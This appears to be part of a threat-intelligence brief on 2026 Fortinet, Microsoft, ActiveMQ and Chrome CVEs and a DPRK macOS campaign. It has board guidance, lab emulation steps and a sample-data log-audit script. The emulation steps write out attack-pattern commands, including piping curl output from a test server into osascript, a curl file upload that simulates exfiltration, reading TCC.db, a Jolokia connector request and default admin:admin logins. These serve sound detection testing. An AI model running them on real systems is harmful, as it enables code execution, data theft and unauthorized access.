  • FCEB / BOD 22-01: CVE-2026-32201 and CVE-2023-21529 carry April 27, 2026 FCEB remediation deadlines. Non-compliance from today is a governance gap.

Apache ActiveMQ CVE-2026-34197

  • FCEB / BOD 22-01: FCEB patch deadline April 30, 2026. Federal agencies and contractors must document compliance.

  • GDPR / NIS2 / HIPAA: ActiveMQ is embedded in many data pipeline and integration architectures. Exploitation could expose data transiting the broker — assess whether PII, PHI, or financial data passes through ActiveMQ instances in scope.

  • Data pipeline risk: Many organizations are unaware that ActiveMQ runs in their environment — it is frequently a transitive dependency of middleware frameworks. Asset discovery is a governance prerequisite here.

Sapphire Sleet macOS Campaign

  • GDPR / DPDP: Exfiltration of employee credentials, session tokens, and Apple Notes content likely constitutes a personal data breach. If any organizational data was captured in Apple Notes or browser sessions, this is a reportable incident in most jurisdictions.

  • Financial regulation (SEBI, FCA, SEC): For crypto, VC, and financial sector organizations, exfiltration of client data, trading credentials, or wallet keys may trigger mandatory notification under sector-specific financial regulation.

  • No recovery path: Organizations must communicate clearly to affected individuals that stolen cryptocurrency cannot be recovered. This is a qualitatively different risk from a password breach.

Board-Level Risk Summary

Today's risk picture is defined by five concurrent exploitation clusters spanning perimeter security infrastructure (Fortinet), enterprise collaboration and networking (Microsoft), enterprise messaging middleware (Apache ActiveMQ), endpoint browsers (Chrome), and a live DPRK state-actor campaign targeting cryptocurrency assets. The absence of a single named victim or headline breach should not create complacency — the CISA KEV listings confirm that exploitation is happening; the absence of victim reporting reflects reporting lag, not absence of impact.

Three questions for the board:

  1. Have we confirmed that our Fortinet estate is patched and FortiCloud SSO audit has been completed for rogue accounts since January 2026?

  2. Are our emergency patching SLAs for KEV-listed, actively exploited CVEs shorter than the CISA-mandated deadlines — or are we relying on federal deadlines as our de-facto patch schedule?

  3. Do our employees in cryptocurrency, finance, and technology roles understand that a fake LinkedIn recruiter message is now a credible nation-state attack vector — and do our macOS endpoints have the controls in place to detect it?

CISO decision framework:

  • Escalate Fortinet remediation and log review as a board-visible risk program where Fortinet gear protects critical or regulated services

  • Approve emergency change windows for SharePoint, Windows IKE, and Exchange this weekend — do not defer to the next scheduled maintenance cycle

  • Mandate that asset discovery includes ActiveMQ instances in all middleware and integration environments before April 30 deadline

  • Issue targeted employee security awareness communication for macOS users in cryptocurrency and finance roles within 24 hours

Chapter 06 - Adversary Emulation

Emulation Scenario A — Sapphire Sleet macOS: Social Engineering to Full Compromise

Objective: Validate macOS endpoint detection coverage against Sapphire Sleet TTPs before the actor reaches production environments.

Prerequisites: macOS test endpoint with EDR deployed; SIEM receiving endpoint telemetry; isolated network segment; approved change control.

Emulation steps (controlled environment only):

  1. Initial Access (T1204.002 + T1059.002): Create a benign .scpt file with quarantine attribute set (xattr -w com.apple.quarantine "0083;..." test.scpt). Open in Script Editor. Validate: Does your EDR alert on Script Editor spawning child processes with network connectivity? Does your SIEM Rule SS-MAC-001 fire?

  2. C2 Simulation (T1059.002): Execute curl -A "mac-cur1" http://your-test-server/stage1.txt | osascript from a test terminal. Validate: Does SIEM Rule SS-MAC-002 trigger on the mac-cur1 user-agent? Does your proxy/DNS logging capture the request?

  3. Persistence simulation (T1547.011): Create a test plist at /Library/LaunchDaemons/com.google.webkit.testonly.plist from a non-Apple-signed process. Validate: Does SIEM Rule SS-MAC-003 fire? Is the LaunchDaemon creation logged in your EDR?

  4. TCC.db access simulation (T1562.001): Execute sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db ".tables" from a test process. Validate: Does SIEM Rule SS-MAC-004 detect the access?

  5. Credential validation simulation (T1056.002): Execute dscl . -authonly testuser wrongpassword from a non-system process. Validate: Does SIEM Rule SS-MAC-005 trigger?

  6. Exfiltration simulation (T1041): Create a test ZIP file and attempt upload to a test server on port 8443 using curl with --upload-file. Validate: Does your DLP or network monitoring alert on compressed file upload to non-approved external host?

Expected detection coverage if rules are deployed: Rules SS-MAC-001 through SS-MAC-005 should fire on steps 1–5. Network rules should fire on steps 2 and 6. Gap expected: TCC.db modification (step 4) may not be captured if your EDR does not have file event monitoring enabled for that path.

Emulation Scenario B — CVE-2026-34197: ActiveMQ Jolokia Exploitation

Objective: Validate detection of Jolokia API abuse before real exploitation.

Prerequisites: Lab ActiveMQ instance (never production); WAF/web proxy with logging; SIEM receiving web server logs.

Emulation steps:

  1. Send a POST request to /api/jolokia/ on the lab instance with addConnector in the body (do not include a real remote URI — use a loopback address). Validate: Does SIEM Rule AMQ-001 fire?

  2. From the lab instance's process context, execute a benign command (e.g., touch /tmp/test_rce_emulation). Validate: Does your EDR alert on the Java/ActiveMQ process spawning a child shell?

  3. Attempt a login to the lab ActiveMQ console using admin:admin. Validate: Does your credential monitoring alert on default credential use?

Expected gap: Most environments do not have WAF coverage on internal ActiveMQ instances. This emulation will frequently reveal that Jolokia exploitation would be completely undetected — treat as a priority detection gap if confirmed.

Emulation Scenario C — Fortinet FortiCloud SSO: Admin Account Audit

Objective: Validate retrospective detection capability for CVE-2026-24858.

This is not active red team — it is a detection audit:

  1. Query your SIEM/log management for all Fortinet admin account creation events from January 15, 2026 to present.

  2. Cross-reference each account creation against your IAM system (AD, LDAP, or identity provider) — any account not matching a known team member is a finding.

  3. For each SSO-sourced admin login in the same period, validate the source IP against your known admin IP allow-list — any unrecognized source IP is a finding requiring investigation.

  4. If findings exist: treat as a potential CVE-2026-24858 exploitation incident and escalate to IR.
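
The audit in steps 1 through 3 can be scripted once the SIEM export is in hand. The following is an added example, not part of the brief: it runs the account-creation and SSO-login checks over constructed sample records (the field names, IAM roster and allow-list are assumptions, not a real Fortinet log schema) and returns the findings that step 4 would escalate.

```python
# Added example for Emulation Scenario C (not from the brief). All records,
# the IAM roster and the allow-list are constructed samples; field names are
# assumptions rather than a real Fortinet/SIEM schema.
from datetime import date
import ipaddress

AUDIT_START = date(2026, 1, 15)  # start of the audit window given in the brief

# Constructed sample telemetry (not real data)
ADMIN_CREATE_EVENTS = [
    {"date": "2026-01-10", "account": "jsmith", "source": "fortigate-01"},
    {"date": "2026-02-03", "account": "svc_backup", "source": "fortigate-01"},
    {"date": "2026-03-21", "account": "support_tmp", "source": "fortigate-02"},
]
SSO_LOGIN_EVENTS = [
    {"date": "2026-02-04", "account": "jsmith", "src_ip": "10.20.0.15"},
    {"date": "2026-03-22", "account": "support_tmp", "src_ip": "203.0.113.77"},
]
IAM_ROSTER = {"jsmith", "svc_backup"}               # accounts known to AD/IdP
ADMIN_ALLOWLIST = ["10.20.0.0/24", "192.0.2.0/24"]  # approved admin source ranges


def in_window(event):
    """Step 1: keep only events on or after the audit start date."""
    return date.fromisoformat(event["date"]) >= AUDIT_START


def ip_allowed(ip, allowlist=ADMIN_ALLOWLIST):
    """Step 3 helper: is the source IP inside any allow-listed range?"""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in allowlist)


def audit(create_events, login_events, roster, allowlist=ADMIN_ALLOWLIST):
    """Return findings: admin accounts created in the window that are not in
    the IAM roster (step 2) and SSO admin logins from unrecognised IPs (step 3)."""
    findings = []
    for ev in filter(in_window, create_events):
        if ev["account"] not in roster:
            findings.append(("unknown_admin_account", ev["account"], ev["source"]))
    for ev in filter(in_window, login_events):
        if not ip_allowed(ev["src_ip"], allowlist):
            findings.append(("sso_login_unrecognized_ip", ev["account"], ev["src_ip"]))
    return findings


if __name__ == "__main__":
    for finding in audit(ADMIN_CREATE_EVENTS, SSO_LOGIN_EVENTS, IAM_ROSTER):
        print("FINDING", *finding)  # step 4: any finding escalates to IR
```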

Intelligence Confidence: 84%
Score: 84 / 100

Contributing factors (positive):
+ Microsoft Threat Intelligence (T1-03, elevated) published full primary
  disclosure for Sapphire Sleet with IOCs, attack chain, and KQL queries;
  highest single-source confidence available (weight: +20)
+ CISA KEV listings (T1-08, authoritative) for CVE-2026-34197, CVE-2026-21643,
  CVE-2026-32201, CVE-2026-3909, CVE-2026-3910; exploitation confirmed
  by U.S. government authority (weight: +18)
+ ZDI April 2026 Patch Tuesday review (T1-19, elevated) corroborates
  Microsoft CVE details independently (weight: +8)
+ Fortinet PSIRT advisory corroborated by Help Net Security, SOC Prime,
  and Shadowserver telemetry; multiple independent sources (weight: +10)
+ Google GTIG corroboration of Sapphire Sleet npm incident (T1-06,
  elevated) strengthens actor attribution (weight: +8)
+ 13 total sources; cross-cluster corroboration across T1 and T2 tiers

Contributing factors (negative):
- No public IOCs for Fortinet EMS/SSO, ActiveMQ, or Chrome clusters;
  exploitation confirmed but tracking/attribution not possible (-6)
- Fortinet/ActiveMQ/Chrome actor attribution: Unattributed (-4)
- Sapphire Sleet campaign start date not confirmed in sources (-2)
- Storm-1175/Exchange attribution: single-source Microsoft; T2
  corroboration is secondary confirmation only (-2)